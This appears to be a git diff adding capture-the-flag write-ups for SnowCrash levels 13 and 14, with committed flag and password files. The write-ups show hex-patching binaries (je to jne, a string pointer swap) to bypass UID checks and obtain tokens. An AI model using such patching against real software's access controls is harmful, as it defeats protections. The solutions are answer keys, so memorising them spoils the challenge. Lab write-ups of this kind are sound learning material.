+1,100 @@ +# Level 0X + +## how to login + +username: level0X + +password: g1qKMiRpXf53AWhDaU7FEkczr + +## Goal + +run `getflag` as user `flagXX` + +## Actually doing something + +```bash +level13@SnowCrash:~$ ll +total 20 +dr-x------ 1 level13 level13 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level13 level13 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level13 level13 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag13 level13 7303 Aug 30 2015 level13* +-r-x------ 1 level13 level13 675 Apr 3 2012 .profile* +level13@SnowCrash:~$ file level13 +level13: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xde91cfbf70ca6632d7e4122f8210985dea778605, not stripped +``` + +A real binary ! + +```c +int main(int argc, const char **argv, const char **envp) +{ + __uid_t uid; // eax + char *tok; // eax + + if ( getuid() != 4242 ) + { + uid = getuid(); + printf("UID %d started us but we we expect %d\n", v3, 4242); + exit(1); + } + tok = ft_des("boe]!ai0FB@.:|L6l@A?>qJ}I"); + return printf("your token is %s\n", tok); +} + +char *__cdecl ft_des(char *s) +{ + unsigned int i; // [esp+2Ch] [ebp-1Ch] + int n; // [esp+30h] [ebp-18h] + int j; // [esp+34h] [ebp-14h] + int k; // [esp+38h] [ebp-10h] + char *str; // [esp+3Ch] [ebp-Ch] + + str = strdup(s); + n = 0; + for ( i = 0; strlen(str) > i; ++i ) + { + if ( n == 6 ) + n = 0; + if ( (i & 1) != 0 ) + { + for ( j = 0; *(char *)(n + 134514368) > j; ++j ) + { + if ( ++str[i] == 127 ) + str[i] = 32; + } + } + else + { + for ( k = 0; *(char *)(n + 134514368) > k; ++k ) + { + if ( --str[i] == 31 ) + str[i] = 126; + } + } + ++n; + } + return str; +} +``` + +This looks complicated, when running the executable we get thrown in the UID mismatch branch. + +Either we reverse the ft_des (compile it on our own and runnit), or I want to try to patch the binary such that it wants to NOT have the given uid it should be possible easily + +```bash +level13@SnowCrash:/tmp/l13$ xxd level13 >level13.xxd.orig +level13@SnowCrash:/tmp/l13$ diff level13.xxd.orig level13.xxd.patched +90c90 +< 0000590: e4f0 83ec 10e8 e6fd ffff 3d92 1000 0074 ..........=....t +--- +> 0000590: e4f0 83ec 10e8 e6fd ffff 3d92 1000 0075 ..........=....t +level13@SnowCrash:/tmp/l13$ xxd -r level13.xxd.patched >level13.patched +level13@SnowCrash:/tmp/l13$ chmod +x level13.patched +level13@SnowCrash:/tmp/l13$ ./level13.patched +your token is 2A31L79asukciNyi8uppkEuSx +``` + +this simple change make the `je` opcode that does the check for the uid into an `jne` aka an `!=` +meaning that we fail ONLY if we have an uid of 4242 instead of failing if we have an uid that isnt 4242 diff --git a/snowcrash/level13/flag b/snowcrash/level13/flag new file mode 100644 index 0000000..58c7d7f --- /dev/null +++ b/snowcrash/level13/flag @@ -0,0 +1 @@ +2A31L79asukciNyi8uppkEuSx diff --git a/snowcrash/level13/passwd b/snowcrash/level13/passwd new file mode 100644 index 0000000..29e9492 --- /dev/null +++ b/snowcrash/level13/passwd @@ -0,0 +1 @@ +g1qKMiRpXf53AWhDaU7FEkczr diff --git a/snowcrash/level14/README.md b/snowcrash/level14/README.md new file mode 100644 index 0000000..de69a0c --- /dev/null +++ b/snowcrash/level14/README.md @@ -0,0 +1,48 @@ +# Level 14 + +## how to login + +username: level14 + +password: 2A31L79asukciNyi8uppkEuSx + +## Goal + +run `getflag` as user `flag14` + +## Actually doing something + +there is nothing -> let have fun with `getflag` binary + +```bash +user14@SnowCrash:/tmp/gf$ mkdir -p /tmp/gf && cd /tmp/gf && cp $(which getflag) getflag.orig +user14@SnowCrash:/tmp/gf$ xxd getflag.orig > getflag.xxd.orig +user14@SnowCrash:/tmp/gf$ cat <getflag.patch +206c206 +< 0000cd0: 89c3 c704 244e 9104 08e8 26f9 ffff 895c ....$N....&....\ +--- +> 0000cd0: 89c3 c704 2420 9204 08e8 26f9 ffff 895c ....$N....&....\ +EOF +user14@SnowCrash:/tmp/gf$ # apply the patch +user14@SnowCrash:/tmp/gf$ xxd -r getflag.xxd.patched > getflag.patched +``` + +after applying this patch, we need to perform the level06 trick again so we have the correct UID + +This patched modified the string pointed in the getflag binary for the UID 3006 is actually the string for the last uid + +after this is done we have the flag + +```bash +7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ +``` + +let check it + +```bash +level14@SnowCrash:/tmp/gf$ su flag14 +Password: +Congratulation. Type getflag to get the key and send it to me the owner of this livecd :) +flag14@SnowCrash:~$ getflag +Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ +``` diff --git a/snowcrash/level14/flag b/snowcrash/level14/flag new file mode 100644 index 0000000..e8aa4cf --- /dev/null +++ b/snowcrash/level14/flag @@ -0,0 +1 @@ +7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ diff --git a/snowcrash/level14/passwd b/snowcrash/level14/passwd new file mode 100644 index 0000000..58c7d7f --- /dev/null +++ b/snowcrash/level14/passwd @@ -0,0 +1 @@ +2A31L79asukciNyi8uppkEuSx